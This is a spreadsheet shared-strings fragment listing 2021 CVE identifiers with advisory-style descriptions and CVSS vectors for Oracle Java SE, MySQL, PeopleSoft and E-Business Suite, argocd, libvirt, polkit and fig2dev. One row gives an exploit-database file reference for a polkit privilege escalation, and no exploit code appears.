  <si>
    <t>CVE-2021-35559</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of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Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35560</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE product of Oracle Java SE (component: Deployment). The supported version that is affected is Java SE: 8u301. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker.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1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35561</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of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Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35562</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Site Level Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Universal Work Queue accessible data as well as unauthorized access to critical data or complete access to all Oracle Universal Work Queue accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35563</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Shipping Execution product of Oracle E-Business Suite (component: Workflow Events). Supported versions that are affected are 12.2.6-12.2.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Shipping Execution. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Shipping Execution accessible data as well as unauthorized access to critical data or complete access to all Oracle Shipping Execution accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35564</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of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Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35565</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35566</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Applications Manager accessible data as well as unauthorized access to critical data or complete access to all Oracle Applications Manager accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35567</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all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6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35568</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Rich Text Editor). Supported versions that are affected are 8.57, 8.58 and 8.59.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1-35569</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Applications Manager accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-3557</t>
  </si>
  <si>
    <t>A flaw was found in argocd. Any unprivileged user is able to deploy argocd in their namespace and with the created ServiceAccount argocd-argocd-server, the unprivileged user is able to read all resources of the cluster including all secrets which might enable privilege escalations. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-35570</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Mobile Field Service product of Oracle E-Business Suite (component: Admin UI). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Mobile Field Service. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Mobile Field Service accessible data as well as unauthorized access to critical data or complete access to all Oracle Mobile Field Service accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35571</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise CS Academic Advisement product of Oracle PeopleSoft (component: Advising Notes). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise CS Academic Advisement. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise CS Academic Advisement accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise CS Academic Advisement accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35572</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). The supported version that is affected is 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Outside In Technology. Note: Outside In Technology is a suite of software development kits (SDKs). The protocol and CVSS Base Score depend on the software that uses Outside In Technology. The CVSS score assumes that the software passes data received over a network directly to Outside In Technology, but if data is not received over a network the CVSS score may be lower. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35573</t>
  </si>
  <si>
    <t>CVE-2021-35574</t>
  </si>
  <si>
    <t>CVE-2021-35575</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.2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35576</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35577</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via MySQL Protcol to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35578</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35580</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: View Reports). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35581</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: View Reports). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35582</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: View Reports). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Applications Manager. CVSS 3.1 Base Score 6.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35583</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Windows). Supported versions that are affected are 8.0.25 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35584</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: ndbcluster/plugin DDL). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35585</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Incentive Compensation product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Incentive Compensation. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Incentive Compensation accessible data as well as unauthorized access to critical data or complete access to all Oracle Incentive Compensation accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35586</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of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5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35587</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35588</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of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3.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35589</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Device drivers). The supported version that is affected is 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 6.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-3559</t>
  </si>
  <si>
    <t>A flaw was found in libvirt in the virConnectListAllNodeDevices API in versions before 7.0.0. It only affects hosts with a PCI device and driver that supports mediated devices (e.g., GRID driver). This flaw could be used by an unprivileged client with a read-only connection to crash the libvirt daemon by executing the 'nodedev-list' virsh command. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35590</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: General). Supported versions that are affected are 7.4.33 and prior, 7.5.23 and prior, 7.6.19 and prior and 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Cluster executes to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Cluster. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2021-35591</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.2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35592</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: General). Supported versions that are affected are 7.5.23 and prior, 7.6.19 and prior and 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Cluster executes to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Cluster. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35593</t>
  </si>
  <si>
    <t>CVE-2021-35594</t>
  </si>
  <si>
    <t>CVE-2021-35595</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Business Interlink). Supported versions that are affected are 8.57, 8.58 and 8.59.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1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35596</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Error Handling). Supported versions that are affected are 8.0.2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35597</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35598</t>
  </si>
  <si>
    <t>CVE-2021-35599</t>
  </si>
  <si>
    <t>Vulnerability in the Zero Downtime DB Migration to Cloud component of Oracle Database Server. The supported version that is affected is 21c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with logon to the infrastructure where Zero Downtime DB Migration to Cloud executes to compromise Zero Downtime DB Migration to Cloud. While the vulnerability is in Zero Downtime DB Migration to Cloud, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Zero Downtime DB Migration to Cloud. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-3560</t>
  </si>
  <si>
    <t>It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>exploits/linux/local/50011.sh</t>
  </si>
  <si>
    <t>Polkit 0.105-26 0.117-2 - Local Privilege Escalation</t>
  </si>
  <si>
    <t>2021-06-15</t>
  </si>
  <si>
    <t>CVE-2021-35601</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise CS SA Integration Pack product of Oracle PeopleSoft (component: Students Administration). Supported versions that are affected are 9.0 and 9.2. Easily exploitable vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the PeopleSoft Enterprise CS SA Integration Pack executes to compromise PeopleSoft Enterprise CS SA Integration Pack. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise CS SA Integration Pack accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35602</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Options). Supported versions that are affected are 8.0.26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0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35603</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of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SS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35604</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.35 and prior and 8.0.2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5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35606</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise CS Campus Community product of Oracle PeopleSoft (component: Notification Framework). Supported versions that are affected are 9.0 and 9.2. Easily exploitable vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the PeopleSoft Enterprise CS Campus Community executes to compromise PeopleSoft Enterprise CS Campus Community. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise CS Campus Community accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35607</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.26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6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35608</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Group Replication Plugin). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35609</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: SQR). Supported versions that are affected are 8.57, 8.58 and 8.59. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-3561</t>
  </si>
  <si>
    <t>An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35610</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.26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7.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35611</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Sales Offline product of Oracle E-Business Suite (component: Offline Template). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Sales Offline. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Sales Offline. CVSS 3.1 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35612</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.2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1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35613</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: General). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35616</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35617</t>
  </si>
  <si>
